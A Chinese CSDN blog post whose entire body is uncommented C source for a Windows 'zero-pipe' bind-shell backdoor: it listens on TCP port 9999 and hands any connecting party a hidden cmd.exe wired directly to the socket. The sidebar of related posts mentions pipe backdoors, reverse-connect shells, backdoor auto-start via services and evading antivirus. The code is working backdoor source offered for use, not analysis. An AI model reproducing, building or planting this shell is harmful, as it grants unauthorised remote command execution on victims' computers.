零管道

最新推荐文章于 2022-01-25 19:32:38 发布
最新推荐文章于 2022-01-25 19:32:38 发布
阅读量819 收藏
点赞数 1
分类专栏: 网络编程 文章标签: socket null winapi path include stream
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/maoxing63570/article/details/6921716
版权 
#include <winsock2.h>
#include <tchar.h>
#include <process.h>

#pragma comment(lib,"WS2_32.lib")

unsigned WINAPI ThreadProc(LPVOID lparam)
{
	SOCKET sock=(SOCKET)lparam;
	STARTUPINFO startinfo={0};
	PROCESS_INFORMATION pi={0};
	
	startinfo.cb=sizeof(STARTUPINFO);
	startinfo.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	startinfo.hStdInput=startinfo.hStdOutput=startinfo.hStdError=(HANDLE)sock;
	startinfo.wShowWindow=SW_HIDE;
	startinfo.lpDesktop=_T("WinSta0\\Default");
	
	TCHAR CmdPath[MAX_PATH]={0};
	GetSystemDirectory(CmdPath,MAX_PATH);
	lstrcat(CmdPath,_T("\\cmd.exe"));
	if(!CreateProcess(CmdPath,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startinfo,&pi))
	{
		return FALSE;
	}

	WaitForSingleObject(pi.hThread,INFINITE);
	WaitForSingleObject(pi.hProcess,INFINITE);
	CloseHandle(pi.hThread);
	CloseHandle(pi.hProcess);
}

void StartShell()
{
	WSADATA wsadata;
	if(WSAStartup(MAKEWORD(2,2),&wsadata))
		return;
	
	if(HIBYTE(wsadata.wVersion)!=2 || LOBYTE(wsadata.wVersion)!=2)
	{
		WSACleanup();
		return;
	}
	
	SOCKET hSock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
	if(hSock==INVALID_SOCKET)
	{
		WSACleanup();
		return;
	}

	SOCKADDR_IN sockaddr;
	sockaddr.sin_family=AF_INET;
	sockaddr.sin_addr.S_un.S_addr=htonl(INADDR_ANY);
	sockaddr.sin_port=htons(9999);
	HANDLE hThread=NULL;
	SOCKET hAcceptSock=INVALID_SOCKET;
	__try
	{
		if(bind(hSock,(SOCKADDR*)&sockaddr,sizeof(sockaddr)))
			__leave;

		if(listen(hSock,5))
			__leave;

		hAcceptSock=accept(hSock,NULL,NULL);
		if(hAcceptSock==INVALID_SOCKET)
			__leave;

		hThread=(HANDLE)_beginthreadex(NULL,0,ThreadProc,(LPVOID)hAcceptSock,0,NULL);
		if(hThread==NULL)
			__leave;

		WaitForSingleObject(hThread,INFINITE);
	}
	__finally
	{
		if(hAcceptSock!=INVALID_SOCKET)
			closesocket(hAcceptSock);

		if(hThread!=NULL)
			CloseHandle(hThread);

		closesocket(hSock);
		WSACleanup();
	}
	
}

int main()
{
	StartShell();
        return 0;
 }


maoxing63570
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
管道:网络自动化管道演示
02-08
网络管道演示-(Meraki,NS1和Umbrella) 此回购是网络自动化管道的演示,汇集了Meraki(网络,环境传感器和IP摄像机),NS1(IPAM),Umbrella(DNS安全和安全Internet网关)和Stealthwatch Cloud(网络行为分析)...
安全之路 —— 管道反向连接后门解析
雨者
03-05 1590
简介 根据前面两篇Blog介绍的双管道后门和单管道后门,他们的特点是一定需要建立管道以便进行进程间通信。但是能不能不需要管道呢?答案是可以的,这里需要借鉴重叠IO的思想,将程序中的socket函数替换成支持重叠IO的WSASocket函数。 核心知识点 si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sSock; 即将Socket...
MFC 执行CMD命令 利用管道技术读取输出内容
wtguo1022的博客
07-02 2980
https://blog.csdn.net/qq61394323/article/details/39829631MFC执行CMD命令并获得其返回信息源代码MFC执行CMD命令并获得其返回值。原理是利用管道技术,创建一个进程执行cmd命令,并将其返回信息存入管道中,再读出管道中的命令即可。以下是我封装的一个函数,参数是要执行的CMD命令,多个命令之间用“&amp;”号隔开,函数的返回值就是执行命令...
技术讨论关于管道CMD后门
冷风
08-08 2812
冷风草草细说下管道 关注.........μρ2ц清风这个不光过卡巴了,,,基本上所有主动防御都过!!包口SSM,微点,,,夕草hot patching.μρ2ц清风对啊..冷风用socket直接替换输入输出的handle,可以实现管道sulwan颠覆核心编程啊.μρ2ц清风反正我是用管道的..幻影    si.hStdInput=hrp1;     si.hStdOutput=hwp2;幻
Windows进程间通信 匿名管道 共享内存 示例:MFC输入cmd命令 cmd执行后输出到MFC界面 不显示CMD窗口
chenhao0568的专栏
01-25 2230
一、共享内存 管 道(Pipe)实际是用于进程间通信的一段共享内存。把管道想想成共享内存比较好理解。 示例:把DOS进程上的内容通过管道技术输出到一个MFC应用程序的CEdit控件中。 CreeatePipe(&hRead,&hWrite,&sa,0); //创建pipe内核对象,设置好hRead,hWrite. 管道2:cmd进程输入重定向到hReadChild从这里读,把MFC命令dir写到hWriteParent里,cmd进程会执行这个命令。 管道1:cmd进程输出重
2021年电主轴精密配件行业工程防管道吊装作业以及吊装机械设备倾覆事故应急预案.pdf
12-22
管道吊装】是建筑工程中常见的一项作业,尤其在电主轴精密配件行业中,由于涉及到复杂的设备安装和维护,管道吊装的安全性至关重要。在电主轴精密配件行业市政道路工程项目中,管道吊装可能包括各种尺寸和重量...
2021年电池及其部件行业工程防管道吊装作业以及吊装机械设备倾覆事故应急预案.pdf
12-22
【电池及其部件行业工程防管道吊装作业应急预案】 在电池及其部件行业的工程建设中,管道吊装是一项关键且风险较高的作业环节。此应急预案旨在确保在进行此类作业时的安全性,预防和应对可能出现的吊装机械设备...
2021年飞机部件行业工程防管道吊装作业以及吊装机械设备倾覆事故应急预案.pdf
12-25
管道吊装】在飞机部件行业的工程作业中是一项至关重要的环节。管道吊装涉及将大型或重型管道在空中移动并精确地安装到预定位置,这通常需要使用专门的吊装机械设备,如起重机、吊车或其他重型提升装置。由于作业...
2021年电子电工部件行业工程防管道吊装作业以及吊装机械设备倾覆事故应急预案.pdf
12-22
【电子电工部件行业工程防管道吊装作业】是工程建设中不可或缺的重要环节,主要涉及在市政道路工程中对管道进行安全、有效地吊装。这一过程涉及到多种风险,包括吊装机械设备可能发生的倾覆事故,因此必须制定详尽...
CreateProcess 输入输出重定向到文件
ey
12-17 1700
运行Demo.java,传a、b值,把输出来的计算结果写到TXT文件中。 Demo.java: import java.util.Scanner; public class Demo { public static void main(String[] args) { Scanner in = new Scanner(System.in); i
VC 获取外部程序执行结果
pcsuite的专栏
04-01 5177
<br />VC上调用外部程序的方法大家应该很熟悉,比如ShellExecute,CreateProcess。<br />例子:<br />system("D://adb.exe devices >c://temp.txt");<br /> <br />ShellExecute(NULL,"open","adb.exe","devices","D://",SW_SHOW);<br /> <br />STARTUPINFO si;<br />PROCESS_INFORMATION pi;<br />Creat
最简单的cmd_8.19
kakaxia6337的专栏
08-19 429
#include #include #pragma comment(lib, "ws2_32.lib")int  cmdshell(SOCKET s){ STARTUPINFO si; PROCESS_INFORMATION pi; GetStartupInfo(&si);//? si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; si.wShowWindow=SW_HIDE;  //这个参数可以变化!!!自己试试 si.hStdInput=si.hS
重定位本进程的标准输出(非子进程)
weixin_34054931的博客
11-09 99
PS:标准输入/标准错误 ,参考这个来弄吧。 环境:Win7(32位/64位),VC6 1、 1 int main() 2 { 3 printf("*stdin : %x\n", *stdin); 4 printf("*stdout : %x\n", *stdout); 5 printf("*stderr : %x\n", *stde...
反向连接打开cmdshell
天元喜羊羊的博客
07-22 1079
源代码: #include #include #pragma comment(lib,"Ws2_32") #define LISTEN_PORT 9090 int main() { WSADATA ws; SOCKET listenFD; int ret; WSAStartup(MAKEWORD(2, 2), &ws); listenFD = WSASocket(AF_IN
如何在父进程中读取子(外部)进程的标准输出和标准错误输出结果
编程语言小筑
02-20 670
最近接手一个小项目,要求使用谷歌的aapt.exe获取apk软件包中的信息。依稀记得去年年中时,有个同事也问过我如何获取被调用进程的输出结果,当时还研究了一番,只是没有做整理。今天花点时间,将该方法整理成文。(转载请指明出于breaksoftware的csdn博客) 在信息化非常发达的今天,可能已经过了江湖“武侠”草莽的时代。仅凭一己之力想完成惊人的创举,可谓难上加难。于是社会分...
安全之路 —— C/C++实现后门的服务自启动
dengdao1372的博客
08-24 291
简介 Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。 C++代码样例 ////////////////////////////////////////////////////////////// // // Fil...
创新药系列阿尔兹海默病千万患者迎来新疗法.pdf
最新发布
07-18
医疗行业研究报告
管道代码
06-02
在编写管道设计相关的代码时,需要涉及到UG软件中的几何模型、部件、装配等方面的知识,同时需要掌握相关的数学和物理知识,如流体力学、热力学等。 以下是一个简单的例子,用于在UG软件中创建一个简单的直管道:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值